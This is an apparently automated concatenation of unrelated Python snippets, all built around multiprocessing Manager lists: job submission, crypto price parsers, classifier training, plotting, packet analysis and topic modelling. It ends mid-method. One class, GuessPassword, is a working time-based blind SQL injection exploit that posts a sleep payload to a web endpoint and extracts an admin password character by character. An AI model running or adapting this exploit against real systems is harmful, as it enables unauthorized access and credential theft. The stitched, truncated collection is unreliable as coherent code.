def run(self, job_name):
    """
    Create the remote job directory, upload the job files and submit the job.

    :param job_name: key of the job under ``job-metadata`` in the batch config
    :return: None; the id reported by the remote queue is printed and stored
             under the job's ``jobIDs`` entry of the batch config
    """
    meta = self.batch_config.get('job-metadata')[job_name]
    submitted_ids = Manager().list()
    cluster = self.batch_config.get('slurm_cluster').get(
        meta['slurm_cluster_name'])
    ssh_config = path_expand(cluster['credentials']['sshconfigpath'])

    def ssh_caller(*args):
        return self._ssh(cluster['name'], ssh_config, *args)

    def scp_caller(*args):
        return self._scp(cluster['name'], ssh_config, *args)

    def remote(target):
        # scp destination in "<cluster name>:<path>" form
        return '%s:%s' % (cluster['name'], target)

    # TODO replace with .format
    ssh_caller(
        'cd %s && mkdir job%s' % (meta['raw_remote_path'], meta['suffix']),
        True)
    scp_caller(meta['slurm_script_path'],
               remote(meta['remote_slurm_script_path']))
    scp_caller(meta['job_script_path'], remote(meta['remote_script_path']))
    ssh_caller('chmod +x', meta['remote_script_path'])
    if meta['input_type'].lower() == 'params+file':
        scp_caller(meta['argfile_path'], remote(meta['remote_path']))

    # Submit, then read the id back from the last line of the queue listing.
    submit_cmd = (
        "cd %s && qsub %s && qstat -u $USER | tail -n 1 | awk '{print $1}'"
        % (meta['remote_path'], meta['remote_slurm_script_path']))
    remote_job_id = ssh_caller(submit_cmd).strip('\n')
    submitted_ids.append(remote_job_id)
    print('Remote job ID: %s' % remote_job_id)
    self.batch_config.deep_set(['job-metadata', job_name, 'jobIDs'],
                               list(submitted_ids))
class Family(object):
    """A family: one shared last name plus a list of unique member names."""

    def __init__(
            self,
            last_name,
            synchronized_approach=SynchronizedListImplementation.THREAD_LOCK):
        print('Create a new family object')
        self._last_name = last_name
        self.synchronized_approach = synchronized_approach
        shared_across_processes = (
            self.synchronized_approach ==
            SynchronizedListImplementation.MULTIPROCESSING_MANAGER)
        # A manager-backed list is only created for the multiprocessing mode.
        self._members = Manager().list() if shared_across_processes else []
        self._lock = threading.Lock()
        self._cnt = 0

    def Add(self, first_name):
        """Add ``first_name`` unless an equal Name is already a member."""
        # NOTE: the membership test and the append are two separate steps and
        # self._lock is not acquired here.
        candidate = Name(first_name, self._last_name)
        if candidate in self._members:
            return
        self._members.append(candidate)

    @property
    def last_name(self):
        return self._last_name

    @last_name.setter
    def last_name(self, value):
        self._last_name = value

    def __str__(self):
        member_lines = '\n'.join(map(str, self._members))
        return '%s Family:\n%s' % (self._last_name, member_lines)
class ParserBithumb:
    """Collect ticker records from the configured URL, one process per currency."""

    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'crypto'
        # Manager-backed list so the child processes can append their records.
        self.items = Manager().list()

    def parse(self, curr: str):
        """Request the ticker for ``curr`` and append the parsed record to ``items``."""
        payload = requests.get(self.url + curr).json()["data"]
        self.items.append({
            "exchange": "bithumb",
            "name": curr.lower(),
            "price": int(payload["closing_price"]),
            "volume": round(float(payload["units_traded"])),
            "date": convert_timestamp_mills(payload['date']),
        })

    def get_items(self) -> List[dict]:
        """Run ``parse`` for every configured currency and return ``items``."""
        workers = [
            Process(target=self.parse, args=(curr,)) for curr in self.currency
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
        return self.items
class MemStorage:
    """In-memory measure store backed by a manager list; usable as a context manager."""

    def __init__(self, config):
        self.config = config
        self.measures = Manager().list()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Nothing to release; exceptions are not suppressed.
        pass

    def save(self, measure):
        """Append ``measure`` to the store."""
        self.measures.append(measure)

    def last(self):
        """Return the most recently saved measure, or None when empty."""
        if len(self.measures) > 0:
            return self.measures[-1]
        return None

    def __str__(self):
        # Items are quoted and concatenated without any separator.
        quoted = "".join("'{}'".format(item) for item in self.measures)
        return "<{} measures: [".format(self.__class__) + quoted + "]>"
def train(target, workers, title):
    """Run ``target`` in two processes over a shared population and plot what they report.

    Each process receives its index, the shared population list and the child
    end of its own pipe. The parent reads one parameter store per process from
    the pipes, plots the first/second components, then waits for the processes
    and prints the ``performance`` of both population members.
    """
    member_count = 2
    parents, childs = zip(*[Pipe() for _ in range(member_count)])

    population = Manager().list([workers[0], workers[1]])

    processes = [
        Process(target=target, args=(index, population, childs[index]))
        for index in range(member_count)
    ]
    # Start every process before reading from any pipe.
    for process in processes:
        process.start()

    params_x, params_y = [], []
    for parent_end in parents:
        params_store = parent_end.recv()
        params_x.append([params[0] for params in params_store])
        params_y.append([params[1] for params in params_store])
    plot(params_x, params_y, title)

    # Block until both processes have terminated.
    for process in processes:
        process.join()

    for member_index in range(member_count):
        print(population[member_index].performance)
class ParserKorbit:
    """Collect ticker records from the configured URL, one process per currency pair."""

    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'crypto'
        # Manager-backed list so the child processes can append their records.
        self.items = Manager().list()

    def parse(self, curr: str):
        """Request the ticker for ``curr`` and append the parsed record to ``items``."""
        payload = requests.get(self.url, {"currency_pair": curr}).json()
        self.items.append({
            "exchange": "korbit",
            "name": curr.replace("_krw", ""),
            "price": int(payload["last"]),
            "volume": round(float(payload["volume"])),
            "date": convert_timestamp_mills(payload['timestamp']),
        })

    def get_items(self) -> List[dict]:
        """Run ``parse`` for every configured currency pair and return ``items``."""
        workers = [
            Process(target=self.parse, args=(curr, )) for curr in self.currency
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
        return self.items
def sampleWithDistInfo_boundStrat_multiThread(self, num):
    """Sample spheres with the boundary strategy using worker processes.

    Randomly sample one configuration in the c-space first (get a sphere),
    then add the sphere to the result set. Repeat: sample the boundary of
    the sphere set and add the new sphere to the set.

    @param num: Total number of spheres, used as the terminate condition.

    TODO: find a terminate condition that can be used to evaluate sphere coverage
    """
    try:
        #self.mDistSamples = Manager().list();
        self.g_failTimes.value = 0;
        boundaryQueue = multiprocessing.Queue();
        # Manager list holding a single dict, handed to every worker.
        dictProxy = Manager().list()
        dictProxy.append({});
        threads = [];
        # Only one worker process is created at the moment.
        threadsCount = 1;
        for i in range(0,threadsCount):
            newThread = Process( target=self.__mltithreadDistSample_boundStrat__, args=[ i, dictProxy, boundaryQueue,num ] );
            threads += [newThread];
        for i in range( 0,threadsCount ):
            threads[i].start();
        # Wait for every worker before reporting the sample count.
        for i in range( 0,threadsCount ):
            threads[i].join();
        print "Get {0} samples".format( len(self.mDistSamples) );
    except Exception, msg:
        print "Failed to start a thread, MSG:\n\t" + str(msg);
        # NOTE(review): confirm this reset is meant for the failure path only.
        self.g_failTimes.value = 0;
def run_everything():
    """Crawl repeatedly, feeding newly discovered words back in as search terms.

    The first search term is read from ``sys.argv[1]``. The loop stops after
    two consecutive rounds that add fewer than three news rows, or when no
    unused word is left.
    """
    setting = get_project_settings()
    used_words = Manager().list()
    pending_words = Manager().list()
    round_count = 0
    # The search value is handed over on the command line.
    search_field = sys.argv[1]
    engine = db_connect()
    session = sessionmaker(bind=engine)()
    baseline_count = 0
    low_yield_rounds = 0
    while True:
        used_words.append(search_field)
        run_spider('thai_spider', setting, search_field, used_words,
                   pending_words)
        session.commit()
        news_count = session.query(func.count(News.id)).scalar()
        print('total news in db is' + str(news_count))
        round_count += 1
        if news_count - baseline_count >= 3:
            # Enough new rows: move the baseline and reset the streak.
            baseline_count = news_count
            low_yield_rounds = 0
        else:
            print("Too low news now let's stop")
            low_yield_rounds += 1
            if low_yield_rounds >= 2:
                break
        if len(pending_words) == 0:
            break
        search_field = pending_words.pop()
def _kmer_frequencies(pool, seqs, ks, kmer_inds, kmer_count_lens):
    """Run ``utils.count_kmers`` over ``seqs`` in ``pool`` and return the results as an array."""
    # One pre-allocated slot per sequence; each task receives its own index
    # and the shared list (presumably writing its result into that slot).
    shared = Manager().list([0] * len(seqs))
    pool.map(utils.count_kmers,
             [[ind, s, ks, kmer_inds, kmer_count_lens, shared]
              for ind, s in enumerate(seqs)])
    return np.array(shared)


def train(plasfile, chromfile, outdir, num_procs,
          ks=(3, 4, 5, 6, 7), lens=(1000, 10000, 100000, 500000),
          coverage=5):
    '''
    Train PlasClass models.

    For every fragment length in ``lens`` a scaler and a logistic-regression
    classifier are fitted on k-mer frequencies of sampled plasmid and
    chromosome fragments and dumped to ``outdir`` as ``s<len>`` / ``m<len>``.

    :param plasfile: plasmid reference sequences
    :param chromfile: chromosome reference sequences
    :param outdir: directory the fitted models are written to
    :param num_procs: number of worker processes for k-mer counting
    :param ks: k-mer sizes
    :param lens: fragment lengths to train a model for
    :param coverage: coverage passed to ``get_num_frags`` (previously fixed at 5)
    '''
    # Work on a private list so the defaults can never be shared or mutated.
    ks = list(ks)

    print("Starting PlasClass training")
    print("Getting reference lengths")
    chrom_names, chrom_lengths = get_seq_lengths(chromfile)
    plas_names, plas_lengths = get_seq_lengths(plasfile)
    for l in lens:
        num_frags = get_num_frags(plas_lengths, l, coverage)
        print("Sampling {} fragments for length {}".format(num_frags, l))
        plas_start_inds = get_start_inds(plas_names, plas_lengths, num_frags, l)
        chrom_start_inds = get_start_inds(chrom_names, chrom_lengths, num_frags, l)
        plas_seqs = get_seqs(plasfile, plas_start_inds, l)
        chrom_seqs = get_seqs(chromfile, chrom_start_inds, l)

        print("Getting k-mer frequencies")
        kmer_inds, kmer_count_lens = utils.compute_kmer_inds(ks)
        pool = mp.Pool(num_procs)
        try:
            plas_freqs = _kmer_frequencies(pool, plas_seqs, ks, kmer_inds,
                                           kmer_count_lens)
            chrom_freqs = _kmer_frequencies(pool, chrom_seqs, ks, kmer_inds,
                                            kmer_count_lens)
            pool.close()
        except Exception:
            # Do not leave worker processes behind when counting fails.
            pool.terminate()
            raise
        finally:
            pool.join()

        print("Learning classifier")
        plas_labels = np.ones(plas_freqs.shape[0])
        chrom_labels = np.zeros(chrom_freqs.shape[0])
        data = np.concatenate((plas_freqs, chrom_freqs))
        labels = np.concatenate((plas_labels, chrom_labels))
        scaler = StandardScaler().fit(data)
        scaled = scaler.transform(data)
        clf = LogisticRegression(solver='liblinear').fit(scaled, labels)

        print("Saving classifier")
        clf_name = 'm' + str(l)
        scaler_name = 's' + str(l)
        dump(clf, os.path.join(outdir, clf_name))
        dump(scaler, os.path.join(outdir, scaler_name))
class Painter():
    """Live line plot of the most recent samples, drawn in a separate process.

    Samples are pushed by calling the instance; ``plot()`` starts a child
    process that animates the last ``memorySize`` samples.
    """

    def __init__(self,
                 repr=('Ax', 'Ay', 'Az', 'Gx', 'Gy', 'Gz', 'Mx', 'My', 'Mz',
                       'Q1', 'Q2', 'Q3', 'Q4', 'Y', 'P', 'R'),
                 display=None,
                 memorySize=10,
                 ylim=(-200, 200)):
        """
        :param repr: label of every channel in a sample
        :param display: indices of the channels to draw (default: all)
        :param memorySize: number of most recent samples shown
        :param ylim: a number ``v`` meaning ``(-v, v)``, or a (low, high) pair
        """
        # Copy the labels so instances never share (or mutate) the default.
        self.repr = list(repr)
        self.n = len(self.repr)
        if display is None:
            self.display = list(range(self.n))
        else:
            self.display = display
        self.memorySize = memorySize
        if isinstance(ylim, numbers.Number):
            self.ylim = (-ylim, ylim)
        else:
            self.ylim = list(ylim)
        # Shared with the plotting process; pre-filled with zero samples.
        self.data = Manager().list(
            [np.zeros(self.n) for i in range(self.memorySize)])
        self.process = None
        self.animation = None
        self.line = [None for i in range(self.n)]

    def __call__(self, data):
        """Append one sample to the shared history."""
        self.data.append(data)

    def plot(self):
        """Start the plotting process."""
        self.process = mp.Process(target=self._plot)
        self.process.start()

    def _plot(self):
        fig = plt.figure()
        self.animation = animation.FuncAnimation(fig=fig,
                                                 func=self._update,
                                                 init_func=self._init,
                                                 interval=20,
                                                 blit=False)
        plt.show()

    def save(self, path):
        # NOTE: self.animation is assigned in _plot, which plot() runs in a
        # child process; in the process that called plot() it is still None.
        self.animation.save(path, fps=30, extra_args=['-vcodec', 'libx264'])

    def _window(self):
        """Return the last ``memorySize`` samples as an array."""
        # Slice on the proxy so only the visible tail is transferred instead
        # of the whole, ever-growing history.
        return np.array(self.data[-self.memorySize:])

    def _init(self):
        data = self._window()
        for i in self.display:
            self.line[i] = plt.plot(data[:, i], label=self.repr[i])[0]
        plt.xlim((0, self.memorySize))
        plt.ylim(self.ylim)
        plt.legend(loc='upper right')

    def _update(self, index):
        data = self._window()
        for i in self.display:
            self.line[i].set_ydata(data[:, i])
class Result:
    """Outcome of a download run: per-url details, finished/failed urls and timings."""

    def __init__(self, urls_detail: dict, finished_urls: list,
                 failed_urls: list, config: Config, start_time, initial_time,
                 end_time):
        # Every collection lives in its own manager-backed container.
        self.urls_detail = Manager().dict()
        self.finished_urls = Manager().list()
        self.failed_urls = Manager().list()
        self.urls_detail.update(urls_detail)
        self.finished_urls.extend(finished_urls)
        self.failed_urls.extend(failed_urls)
        self.config = copy.deepcopy(config)
        self.start_time = start_time
        self.initial_time = initial_time
        self.end_time = end_time

    def get_failed_urls(self):
        return self.failed_urls

    def get_finished_urls(self):
        return self.finished_urls

    def get_urls_detail_dict(self):
        return self.urls_detail

    def retry_failed_urls(self, *new_config: Config):
        """Download the failed urls again and merge the outcome into this result.

        When exactly one config is passed it is used (and listed) for the
        retry; otherwise the stored config is used. Always returns True.
        """
        if len(self.failed_urls) == 0:
            print("no failed urls")
            return True
        use_override = len(new_config) == 1
        config = copy.deepcopy(new_config[0] if use_override else self.config)
        if use_override:
            config.list_config()
        retry_result = Downloader(config).get_result(self.failed_urls)
        self.failed_urls = retry_result.failed_urls
        for url in retry_result.finished_urls:
            self.finished_urls.append(url)
        self.urls_detail.update(retry_result.urls_detail)
        return True

    def show_time_cost(self):
        """Print the initialisation, download and total durations."""
        init_cost = self.initial_time - self.start_time
        download_cost = self.end_time - self.initial_time
        total_cost = self.end_time - self.start_time
        lines = [
            'initialize download tasks cost: {:.2f}s'.format(init_cost),
            'finish download task cost: {:.2f}s'.format(download_cost),
            'total cost: {:.2f}s'.format(total_cost),
        ]
        print('\n'.join(lines))

    def show_urls_status(self):
        """Print the finished / failed / total url counts on one line."""
        finished = len(self.finished_urls)
        failed = len(self.failed_urls)
        parts = [
            'finished: ' + str(finished),
            'failed: ' + str(failed),
            'total: ' + str(finished + failed),
        ]
        print('|'.join(parts))
class GuessPassword(object):
    """Multi-process, timing-based probe that records one character per position.

    Positions are taken from a shared queue; for each position every candidate
    character code is sent in a request and the candidate whose request times
    out is stored in ``result``.
    """

    def __init__(self, passwd_length, processes=6, timeout=3):
        # Shared between the worker processes.
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`) union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"
        self.stop_flag.append(False)  # must be append: self.stop_flag[0] = False would raise an index-out-of-range error on the still-empty list
        # Queue the positions 1 .. passwd_length - 1.
        for _ in range(1, self.passwd_length):
            self.queue.put(_)

    def exploit(self):
        """Worker loop: take positions from the queue until it is empty or the stop flag is set."""
        while not self.queue.empty() and not self.stop_flag[0]:
            passwd_position = self.queue.get()
            for _guess_char in range(33, 128):
                payload = self.payload.format(position=passwd_position,
                                              guess_char=_guess_char)
                exp_data = {'sid': payload}
                try:
                    res = requests.post(self.url,
                                        data=exp_data,
                                        cookies=self.cookie,
                                        timeout=self.timeout)
                except requests.ReadTimeout:
                    # A read timeout is what marks the candidate as the match.
                    self.lock.acquire()
                    self.result[passwd_position] = chr(_guess_char)
                    print "Data %dth: %s" % (passwd_position,
                                             self.result[passwd_position])
                    self.lock.release()
                    break

    def run(self):
        """Start the workers, wait for them, and print the collected result."""
        for _ in range(self.processes):
            _worker = Process(target=self.exploit)
            # _worker.daemon = True
            _worker.start()
        try:
            while len(
                    multiprocessing.active_children()) > 2:  # Why "> 2" rather than "> 0": once all workers have exited, two child processes are still running, namely the two Manager processes (used to share data between processes); multiprocessing.active_children() returns the list of currently live child process objects
                # self.lock.acquire()
                # print len(multiprocessing.active_children())
                # self.lock.release()
                time.sleep(1)
        except KeyboardInterrupt:
            self.lock.acquire()
            print 'wait for all subprocess stop......'
            self.stop_flag[0] = True
            self.lock.release()
        else:
            print self.result
        print 'finish'
def _get_ruuvitag_datas(macs=[],
                        search_duratio_sec=None,
                        run_flag=RunFlag(),
                        bt_device=''):
    """
    Read advertisements from ``ble.get_datas`` and yield the decoded ones.

    Args:
        macs (list): MAC whitelist, compared case-insensitively. Empty means no filtering
        search_duratio_sec (int): Stop after this many seconds. None means no limit
        run_flag (object): Iteration stops once ``run_flag.running`` is false
        bt_device (string): Bluetooth device id passed to ``ble.get_datas``

    Yields:
        tuple: MAC and decoded sensor data
    """
    mac_blacklist = Manager().list()
    start_time = time.time()
    data_iter = ble.get_datas(mac_blacklist, bt_device)

    for ble_data in data_iter:
        # Stop on timeout
        timed_out = search_duratio_sec and \
            time.time() - start_time > search_duratio_sec
        if timed_out:
            data_iter.send(StopIteration)
            break
        # Stop when the caller cleared the running flag
        if not run_flag.running:
            data_iter.send(StopIteration)
            break

        # Whitelist check on the advertised MAC, when there is one
        if ble_data[0] and macs and not ble_data[0].upper() in map(
                str.upper, macs):
            continue

        (data_format, data) = DataFormats.convert_data(ble_data[1])
        if data is None:
            # Not convertible: blacklist the sender if its MAC is known
            if ble_data[0]:
                mac_blacklist.append(ble_data[0])
            continue

        decoded = get_decoder(data_format).decode_data(data)
        if decoded is None:
            log.error('Decoded data is null. MAC: %s - Raw: %s', ble_data[0],
                      ble_data[1])
            continue

        # Fall back to the MAC carried in the payload when none was advertised
        if ble_data[0]:
            mac = ble_data[0]
        elif decoded['mac']:
            mac = parse_mac(data_format, decoded['mac'])
        else:
            mac = None

        # Whitelist check again, now with the resolved MAC
        if mac and macs and mac.upper() not in map(str.upper, macs):
            continue
        yield (mac, decoded)
def generate_permuted_matrices(file_name, n_start, n_end, p_factor, sa_factor,
                               use_cache):
    """Permute the dataset matrix for every index in ``[n_start, n_end)``.

    Indices whose permutation file already exists in the cache folder are
    skipped when ``use_cache`` is set; the rest are handed to
    ``permute_matrix`` through a pool of ``p_factor`` processes.
    """
    dataset_path = os.path.join(constants.DATASETS_FOLDER,
                                "{}.tsv".format(file_name))
    mat = pd.read_csv(dataset_path, sep='\t', index_col=0)
    p = Pool(p_factor)
    # Shared list; one entry is added here per permutation found in the cache.
    arr = Manager().list([])
    params = []
    mat[pd.isna(mat)] = 0  # MODIFY THIS LINE
    for a in np.arange(n_start, n_end):
        cached_path = os.path.join(constants.CACHE_FOLDER, file_name,
                                   "{}_perm_{}.tsv".format(file_name, a))
        if use_cache and os.path.exists(cached_path):
            arr.append(1)
            continue
        params.append([mat, file_name, sa_factor, a, arr])

    total = n_end - n_start
    cached_count = len(arr)
    print("permuting {}/{} matrices ({} exist in cache)".format(
        total - cached_count, total, cached_count))
    p.map(permute_matrix, params)
def run(dir_name, device_mac, script_dir, previous_info, num_proc):
    """Analyse every pcap file under ``dir_name`` with ``num_proc`` processes.

    The pcap paths are dealt round-robin into the module-level ``filenames``
    buckets, one process per bucket runs ``dst_protocol_analysis``, and the
    per-process results are merged into the list returned to the caller.
    """
    global filenames
    print("    Reading the destination info...")
    read_dst_csv(result=previous_info)
    print("    Reading common protocol and port info...")
    read_protocol_csv(script_dir + "/protocol_analysis/protocols_info.csv")
    print("    Analyzing the protocol and port of each packet...")

    results = Manager().list()
    for _ in range(num_proc):
        filenames.append([])
        results.append([])

    # Deal the capture files out to the buckets in turn.
    bucket = 0
    for root, dirs, files in os.walk(dir_name):
        for filename in files:
            if not filename.endswith(".pcap") or filename.startswith("."):
                continue
            filenames[bucket].append(root + "/" + filename)
            bucket += 1
            if bucket >= num_proc:
                bucket = 0

    procs = []
    for worker_id in range(num_proc):
        p = Process(target=dst_protocol_analysis,
                    args=(worker_id, device_mac, results))
        procs.append(p)
        p.start()
    for p in procs:
        p.join()

    # Fold the results of workers 1..n-1 into those of worker 0.
    combined_results = results[0]
    for worker_id in range(1, num_proc):
        for dst_pro in results[worker_id]:
            if dst_pro not in combined_results:
                combined_results.append(dst_pro)
                continue
            existing = combined_results[combined_results.index(dst_pro)]
            existing.add_all(dst_pro.snd, dst_pro.rcv, dst_pro.p_snd,
                             dst_pro.p_rcv)
    return combined_results
def cluster_to_hotspot(self, texts_list, top_k, kw_num, text_sim_threshold,
                       topic_sim_threshold) -> List[Hotspot]:
    """Cluster texts into hotspots in parallel and return the top ranked ones.

    The texts are split into ``self.process_num`` parts and clustered by one
    process each. The per-process results are then merged pairwise, again one
    process per pair, until a single hotspot list is left.

    :param texts_list: texts to cluster
    :param top_k: maximum number of hotspots returned
    :param kw_num: keyword count passed to every TextClusterModel
    :param text_sim_threshold: similarity threshold for text clustering
    :param topic_sim_threshold: similarity threshold for merging hotspots
    :return: up to ``top_k`` hotspots sorted by ``ranks`` descending; an empty
             list when no process produced a result
    """

    def run_models(models, sink):
        # One process per model; every model appends its result to ``sink``.
        workers = [
            Process(target=model.cluster_to, args=(sink, )) for model in models
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()

    texts_list = split_list(texts_list, self.process_num)
    model_list = [
        TextClusterModel(texts=texts_list[i],
                         vec_model=self.w2v_model,
                         kw_num=kw_num,
                         sim_threshold=text_sim_threshold)
        for i in range(self.process_num)
    ]
    shared_res_list = Manager().list([])
    run_models(model_list, shared_res_list)

    # 3. hotspot cluster
    logger.info('{} processes finished, shared_res_list length:{}'.format(
        self.process_num, len(shared_res_list)))
    while len(shared_res_list) > 1:
        # Snapshot once, then pair neighbours explicitly instead of relying
        # on an exception to detect the odd element out.
        pending = shared_res_list[:]
        pair_models = [
            HotspotClusterModel(
                hotspots_1=pending[i],
                hotspots_2=pending[i + 1],
                sim_threshold=topic_sim_threshold,
            ) for i in range(0,
                             len(pending) - 1, 2)
        ]
        shared_res_list = Manager().list([])
        if len(pending) % 2:
            # The unpaired last result is carried over to the next round.
            shared_res_list.append(pending[-1])
        run_models(pair_models, shared_res_list)
        logger.info('Shared_res_list length:{}'.format(len(shared_res_list)))
    logger.info('Shared_res_list length:{}'.format(len(shared_res_list)))

    if len(shared_res_list) == 0:
        return []
    return sorted(shared_res_list[0], key=lambda x: x.ranks,
                  reverse=True)[:top_k]
def LDA_topic_modeller_by_quarter_by_brand_multiprocessing(
        DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS,
        number_of_topics_range):
    """Build one LDA model per (quarter, brand) in parallel and export the results.

    The cleaned documents are read from the pickle cache when both cache
    files exist, otherwise produced by ``Preprocessing``. Only quarters of
    2016-2018 are modelled. The combined result is written to
    'topic model results/LDA Topic Model by Quarter by Brand.xlsx'.

    Note: adds/overwrites the 'Date' and 'Y-Quarter' columns of ``DF``.

    Returns:
        None
    """
    from multiprocessing import Pool, cpu_count

    cache_template = 'pickle_files/{}.pickle'
    by_quarter_cache = cache_template.format('processed_data_by_quarter')
    by_brand_cache = cache_template.format(
        'processed_data_by_quarter_by_brand')

    #Read in processed documents from cache, or process new document
    if os.path.isfile(by_quarter_cache) and os.path.isfile(by_brand_cache):
        with open(by_brand_cache, 'rb') as handle_2:
            dict_of_clean_doc_by_quarter_by_brand = pickle.load(handle_2)
    else:
        _, dict_of_clean_doc_by_quarter_by_brand = Preprocessing(
            DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS)

    #Generate list of quarters
    DF['Date'] = pd.to_datetime(DF['Date'], infer_datetime_format=True)
    DF['Y-Quarter'] = DF['Date'].dt.to_period("Q")
    list_of_quarters = DF['Y-Quarter'].unique()

    #Limit quarters to those in 2016, 2017, 2018
    list_of_years_to_include = ['2016', '2017', '2018']
    list_of_quarters = [
        quarter for quarter in list_of_quarters
        if any(year in str(quarter) for year in list_of_years_to_include)
    ]

    combination_of_brands = []
    for quarter in list_of_quarters:
        combination_of_brands += list(
            itertools.product(
                [str(quarter)],
                dict_of_clean_doc_by_quarter_by_brand[str(quarter)].keys()))

    print("{} products found... ".format(str(len(combination_of_brands))))
    list_of_arguments = [(dict_of_clean_doc_by_quarter_by_brand,
                          str(quarter_brand[0]), quarter_brand[1],
                          number_of_topics_range)
                         for quarter_brand in combination_of_brands]

    with Pool(processes=cpu_count() * 2) as pool:
        review_dfs = pool.starmap(build_single_LDA_model, list_of_arguments)
        pool.close()
        pool.join()

    # starmap already returns the list of per-model frames; concatenate it
    # directly (list.append returns None, so its result must not be reused).
    output_df = pd.concat(review_dfs, ignore_index=True)

    # The context manager saves and closes the workbook.
    with pd.ExcelWriter(
            'topic model results/LDA Topic Model by Quarter by Brand.xlsx'
    ) as writer:
        output_df.to_excel(writer,
                           sheet_name='Topic Model by Quarter by Brand')
    return
class thread(threading.Thread):
    """Thread that runs ``f`` in a child process and waits for it to finish."""

    def __init__(self, c0):
        super(thread, self).__init__()
        self.flag = True
        # Manager-backed list handed to the child process.
        self.l = Manager().list([0, 1, 'ss'])
        self.c0 = c0  # keeps the end of the pipe

    def run(self):
        # Start the process that runs f with the shared list and the pipe
        # end, then block until it exits.
        self.p = Process(target=f, args=(self.l, self.c0))
        self.p.start()
        self.p.join()
class Storage(object):
    """Bounded FIFO sample store shared between worker processes.

    Once ``maxsize`` items are stored, appending drops the oldest item.
    Random sampling stays away from the tail of the list by a safety margin
    so an index stays valid even if every worker removes an item meanwhile.
    """

    def __init__(self,
                 maxsize,
                 storage_batchs,
                 num_speakers_in_batch,
                 num_threads=8):
        """
        :param maxsize: maximum number of stored items
        :param storage_batchs: when >= 3, the last batch is excluded from sampling
        :param num_speakers_in_batch: size of the excluded last batch
        :param num_threads: number of workers assumed to remove items concurrently
        """
        # use multiprocessing for threading safe
        self.storage = Manager().list()
        self.maxsize = maxsize
        self.num_speakers_in_batch = num_speakers_in_batch
        self.num_threads = num_threads
        self.ignore_last_batch = False
        if storage_batchs >= 3:
            self.ignore_last_batch = True

        # used for fast random sample
        self.safe_storage_size = self.maxsize - self.num_threads
        if self.ignore_last_batch:
            self.safe_storage_size -= self.num_speakers_in_batch

    def __len__(self):
        return len(self.storage)

    def full(self):
        """Return True when the store holds at least ``maxsize`` items."""
        return len(self.storage) >= self.maxsize

    def append(self, item):
        """Store ``item``, dropping the oldest item first when full."""
        # if storage is full, remove an item
        if self.full():
            self.storage.pop(0)

        self.storage.append(item)

    def _sample_below(self, safe_size):
        """Return a random item whose index is in ``[0, safe_size - 1]``.

        ``random.randint`` includes its upper bound, so the bound is
        ``safe_size - 1``; a non-positive ``safe_size`` falls back to index 0.
        Raises IndexError when the storage is empty.
        """
        return self.storage[random.randint(0, max(safe_size - 1, 0))]

    def get_random_sample(self):
        """Return a random item from the currently safe part of the storage."""
        # safe storage size considering all threads remove one item from storage in same time
        storage_size = len(self.storage) - self.num_threads

        if self.ignore_last_batch:
            storage_size -= self.num_speakers_in_batch

        return self._sample_below(storage_size)

    def get_random_sample_fast(self):
        """Call this method only when storage is full"""
        return self._sample_below(self.safe_storage_size)
def run():
    """Start one worker process per credentials line and wait for all of them."""
    # make sure no old procs left running
    for image_name in ('plugin-container.exe', 'firefox.exe',
                       'geckodriver.exe', 'helper.exe'):
        os.system('taskkill /F /IM %s' % image_name)

    # bot credentials, format: 'login:password:port'
    with open('creds_list.txt', 'r') as infile:
        stripped_lines = (line.strip() for line in infile)
        bot_creds_list = [entry for entry in stripped_lines if entry]

    # launch redis cache server
    run_redis_srv()

    # populate companies list from file
    companies_list = Manager().list()
    with open('companies_list_filtered.txt') as infile:
        for raw_cid in infile:
            cid = raw_cid.strip()
            if cid:
                companies_list.append(cid)

    # set to limit max bots from creds_list[]
    limit = len(bot_creds_list)
    proc_list = [
        Process(target=worker, args=(companies_list, bot_creds))
        for bot_creds in bot_creds_list[0:limit]
    ]

    # Workers are started roughly one minute apart.
    for worker_num, worker_proc in enumerate(proc_list):
        worker_proc.start()
        print('started worker: %s' % worker_num)
        time.sleep(random.randint(55, 65))

    for worker_num, worker_proc in enumerate(proc_list):
        worker_proc.join()
        print('joined worker: %s' % worker_num)
class Scanner(object):
    """Holds the list of scan tasks plus small network helpers."""

    def __init__(self):
        self.task = Manager().list()
        self.outputer = Outputer()

    def add_task(self, root_domain, domain, s_type):
        """Queue a (root_domain, domain, s_type) task and print the task list."""
        self.task.append((root_domain, domain, s_type))
        print(self.task)
        return

    def check_network(self, domain):
        """Return True when an HTTP request to ``domain`` reports no error."""
        res, code, error = my_request("http://" + domain)
        if error:
            warning = str(error)
            print(warning)
            return False
        return True

    def _get_ip(self, domain):
        """Look up the IP of ``domain`` through ip-api.com, trying up to three times.

        Returns the last value read from the service (None if every attempt
        failed before a value was read).
        """
        retry = 3
        ip = None
        api = "http://ip-api.com/json/%s?lang=en" % domain
        for _attempt in range(retry):
            try:
                res = urllib2.urlopen(api).read()
                ip = json.loads(res)["query"].encode('utf8')
                if re.match("\d+\.\d+\.\d+\.\d+", ip):
                    break
            except Exception as e:
                print(e)
        return ip
class Analyzer(object):
    """Builds a word list per topic directory and matches files against them."""

    def __init__(self, num_proc, path_to_data):
        self.num_proc = num_proc
        self.path_to_data = path_to_data
        self.global_lst = Manager().list()
        self.topic_lst = os.listdir(path_to_data)

        topic_total = len(self.topic_lst)
        has_remainder = (topic_total / num_proc) - (topic_total //
                                                    num_proc) != 0
        # Topics per process, rounded up when they do not divide evenly.
        self.size_group = len(os.listdir(path_to_data)) // num_proc + (
            1 if has_remainder else 0)

        # One placeholder entry per topic until analyzer() fills it in.
        for _ in self.topic_lst:
            self.global_lst.append([10])

    @staticmethod
    def _unique_words(text):
